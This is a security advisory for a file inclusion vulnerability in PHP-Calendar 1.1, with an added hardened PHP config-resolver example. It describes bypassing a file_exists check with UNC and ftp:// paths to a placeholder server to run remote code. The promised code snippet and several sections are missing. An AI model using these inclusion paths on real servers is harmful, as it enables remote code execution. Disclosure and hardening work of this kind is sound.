[ISecAuditors Security Advisories] PHP-Calendar <= v1.1 'configfile' Remote and Local File Inclusion vulnerability
2009-12-21T00:00:00
ID SECURITYVULNS:DOC:22976 Type securityvulns Reporter Securityvulns Modified 2009-12-21T00:00:00
Description
=============================================
INTERNET SECURITY AUDITORS ALERT 2009-011
- Original release date: October 13th, 2009
- Last revised: December 18th, 2009
- Discovered by: Juan Galiana Lara
- CVE ID: CVE-2009-3702
- Severity: 8.5/10 (CVSS Base Score)
=============================================
I. VULNERABILITY
PHP-Calendar v1.1 'configfile' Remote and Local File Inclusion
vulnerability
II. BACKGROUND
PHP-Calendar is a simple web calendar. It is targeted towards groups
that need to collaboratively create and track events. In that same
collaborative spirit, the source for PHP-Calendar is available under
an open source license for anyone to use and modify.
III. DESCRIPTION
The 'configfile' variable is not properly filtered, and it is possible
to include arbitrary remote and local files. This attack may lead to
the execution of arbitrary code.
The snippet of vulnerable code (part of update08.php and update10.php
file):
In order to include remote files, the allow_url_fopen directive must
be set to 'On'. There are two cases in which remote code execution is
possible because the file_exists check can be bypassed:
1) If the victim server is running a Windows operating system and there
is no firewall filtering outgoing SMB requests, an attacker can use
a URL like //servername/path/to/file.php
2) If the server is running PHP version > 5.0.0 (the most common), an
attacker can use the FTP/FTPS protocol for inclusion, like
ftp://servername/path/to/file.php. See references for more information.
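Added example (not part of the advisory and not PHP-Calendar code): a hardened replacement for the file_exists()/require_once() pattern described above, which treats the parameter as a bare config name and resolves it inside one fixed directory. The function name resolve_config(), the demo directory and the sample inputs are assumptions made for illustration.

```php
<?php
// Added example, not PHP-Calendar code. resolve_config() and the demo
// directory are assumptions made for illustration.
//
// Pattern quoted in the advisory (update08.php), kept here as a comment:
//   } elseif(!empty($_GET['configfile'])) {
//       if(file_exists($_GET['configfile'])) {
//           require_once($_GET['configfile']);
// file_exists() only proves that something answers at that path; it says
// nothing about where the path points.

/**
 * Map a request-supplied config name to a file inside $baseDir,
 * or return null when the name must not be used.
 */
function resolve_config(string $name, string $baseDir): ?string
{
    // Character allowlist (same class as the advisory's ereg() filter, written
    // with preg_match because ereg() was removed in PHP 7). \A and \z anchor
    // the whole string, so a trailing newline is rejected too.
    if (preg_match('/\A[a-zA-Z0-9_]{1,64}\z/', $name) !== 1) {
        return null;
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $real === false) {
        return null; // directory or file does not exist
    }
    // realpath() resolved symlinks; the result must still sit under $base.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0 || !is_file($real)) {
        return null;
    }
    return $real;
}

// Demo with a throwaway directory holding one constructed config file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'cfgdemo_' . bin2hex(random_bytes(4));
mkdir($dir, 0700);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'site_config.php', "<?php // constructed sample\n");

// Constructed inputs; the path shapes are the ones the advisory describes.
$inputs = [
    'site_config',
    '/etc/passwd',
    '//servername/path/to/file.php',
    'ftp://servername/path/to/file.php',
    '../site_config',
    "site_config\n",
];
foreach ($inputs as $in) {
    $path = resolve_config($in, $dir);
    printf("%-40s %s\n", json_encode($in, JSON_UNESCAPED_SLASHES), $path === null ? 'rejected' : 'accepted');
}

unlink($dir . DIRECTORY_SEPARATOR . 'site_config.php');
rmdir($dir);
```

Because the name can never contain a slash, colon or dot, absolute paths, UNC shares and URL wrappers are rejected before any filesystem or network access happens; only the returned path is then passed to require_once().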
This vulnerability has been discovered by
Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).
X. REVISION HISTORY
October 13, 2009: Initial release.
October 19, 2009: Added CVE id.
December 18, 2009: Last revision.
XI. DISCLOSURE TIMELINE
October 13, 2009: Vulnerability discovered by
Internet Security Auditors (www.isecauditors.com)
October 13, 2009: Sent to developers. No response.
December 13, 2009: Contact again. No response.
December 18, 2009: Added mitigation solution and sent to lists.
XII. LEGAL NOTICES
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.